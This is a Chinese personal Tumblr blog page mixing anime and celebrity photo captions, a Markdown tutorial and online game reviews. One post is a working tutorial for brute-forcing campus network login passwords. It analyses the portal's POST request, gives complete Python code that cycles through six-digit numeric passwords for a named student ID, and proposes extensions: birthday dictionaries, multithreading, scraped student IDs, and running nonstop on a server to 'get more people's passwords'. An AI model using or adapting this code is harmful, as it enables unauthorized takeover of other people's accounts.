Don't wanna be here? Send us removal request.
Photo
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
和泉纱雾是今年4月新番《埃罗芒阿老师》里主角的妹妹,非常的可爱。虽然足不出户,但却是一个小黄图画师,而且经常摆出各种姿势自拍,自己给自己当模特。嗯……这太不和谐了!
第一张是翻转去掉了不和谐部分做壁纸 日常舔屏幕
0 notes
Photo
Tumblr media Tumblr media
定个小目标,像食堂小哥一样帅气
0 notes
Photo
Tumblr media
洛神
蔡少芬真是漂亮 会说话的大眼睛,一颦一蹙间尽显女神韵味
0 notes
Photo
Tumblr media
校园网密码暴力破解
导语:校园网使用一人一账号式验证登录上网,登录页面无验证码。通过抓包分析浏览器提交请求 从而构造post信息 使用python暴力破解
校园网环境
校园网采用三级代理模式,内网-验证服务器-外部网络 方式架设。用户提交至验证服务器,服务器通过用户提交信息与内部数据库对比。决定是否通过验证。
客户端与页面
观察客户端与网页登录界面均无验证码,且用户为6位纯数字弱密码 通过简单循环提交即可破解
抓包分析
Wireshark抓取登录过程提交数据分析登录过程提交的用户数据,从登录网页可知验证服务器为:192.168.129.2 通过分析包得到用户向服务器递交的数据:
Tumblr media Tumblr media
其中:
WLAN userip为外网ip,
ssid为室内路由id,
mac为本机物理地址
username和pwd为用户信息(学号密码)
构造data包
data={ 'wlanuserip':'18a8c3e44a5075034b903f731f0156ad', 'wlanacname':'24657c1fce9b8a9706fc7096a2aa34fb', 'ssid':'24ef729a81bf6960f52563a493d87768', 'nasip':'c77443f80d97f4f46315ab96e6638a81', 'mac':'f5c1b117e413b1a2d0915d17b5b58a13', 't':'wireless-v2', 'username':'3140514021', 'pwd':password }
使用request暴力破解
使用循环自增password 构造数据包 使用request提交。通过浏览器返回的history 判断登录成功与否。函数基本逻辑如下
Tumblr media
全部代码
import requests def main(): password=300000 url = 'http://192.168.129.2//eportal/userV2.do?method=login' i=999999 while i: data={ 'wlanuserip':'18a8c3e44a5075034b903f731f0156ad', 'wlanacname':'24657c1fce9b8a9706fc7096a2aa34fb', 'ssid':'24ef729a81bf6960f52563a493d87768', 'nasip':'c77443f80d97f4f46315ab96e6638a81', 'mac':'f5c1b117e413b1a2d0915d17b5b58a13', 't':'wireless-v2', 'username':'3140514021', 'pwd':password } r= requests.post(url,data=data) password +=1 h = r.history a=1 if h: print('正在测试',i) a+=1 i-=1 else : password=password-2 print ('密码是:') print (password) i=0 break main()
程序运行结果如下
Tumblr media
总结
虽然只有不到30行代码,但编写过程磕磕碰碰,本想通过嵌套循环实现判断最终因为条件的判断出现问题没能实现。回过头看代码还有很多值得优化的地方:
密码+1破解速度感人,考虑到密码为6位纯数字可以引入生日密码库优先测试
函数单线程运行效率低,可以通过构造多个request将密码分为多个部分单独运行,提升运行效率
学号部分为手动输入,是否可以引入变量,将爬取到的学号和密码写入excle。
增加退出登录函数,获取更多人的密码。
将代码部署到服务器上24h 不间断运行。
python学无止境
0 notes
Video
tumblr
0 notes
Text
Markdown学习笔记
一、认识Markdown
Markdown 是一种用来写作的轻量级「标记语言」。它使我们专心于码字,用「标记」语法,来代替常见的排版格式Markdown语法简单,完成简单的笔记记录等工作只需要用到十几个左右的符号。而且很多网站(例如简书、知乎)都支持Markdown的文字录入。
二、Markdown 简要语法规则
标题
在Markdown,如果要定义一段文字为标题,只需在文字前加 # 。
这是一级标题
这是二级标题
这是六级标题
markdown支持六级标题(#之后需要跟进一个空格),似乎tumblr对三级后标题自动加粗。
列表
Markdown使用+,-或者*定义无序列表,有序列表只需在文字前加数字和英文句点 1. 2. 3. 比如
无序列表
1
2
3
有序列表
1
2
3
引用
如果需要引用别处的一段话,那么需要用到引用格式。用 > 标记你的引用
就像这样。
引用可以使用 >> 嵌套,也可以在引用区块间加入Markdown其他语法,包括标题、列表、代码。比如:
引用
嵌套引用
需要注意的是引用前后最后都加上一行空格,避免Markdown“引用”你的整篇文章
斜体和加粗
使用下划线(_)或乘号(*)倾斜文字,使用双下划线(__)或者双乘号(**)加粗文字。反引号(`)标记代码 italic,bold,code
链接和图片
插入链接与插入图片的语法很像,区别在一个 !号
图片为:
链接为:
方括号内为描述圆括号内填写链接的url
代码
使用反引号`加入行间代码, 还有块代码(block code)的写法:代码每一行的前面都加4个空格或一个tab)
data = { 'code' }
三、参考
Markdown维基
Markdown语法 By @riku
Markdown入门指南
相关
有道云笔记
Markdown写作浅谈
0 notes
Photo
Tumblr media
说剑
一款水墨风格的小游戏 剧情和画风都十分出色,玩法有些欠缺。
0 notes
Photo
Tumblr media
天涯明月刀
腾讯北极星工作室打造的电影级网游,游戏场景逼真画质精美。可惜游戏玩法单调、重复。又有运营和策划急于捞金(TX游戏素有没钱玩nmb之称)加速游戏死亡,当下游戏谋求二次元创作,线下活动延续游戏生命。
Tumblr media
既然玩了那么久 铛铛铛然~在这里认识了几个小伙伴
西柚
Tumblr media
可爱的西柚小姐姐 还有她的背影照
Tumblr media
呼哗哗哗
还有西奈
Tumblr media
耿直的重庆boy 
这个游戏最幸运的事不是boss的掉落 而是认识你们!
0 notes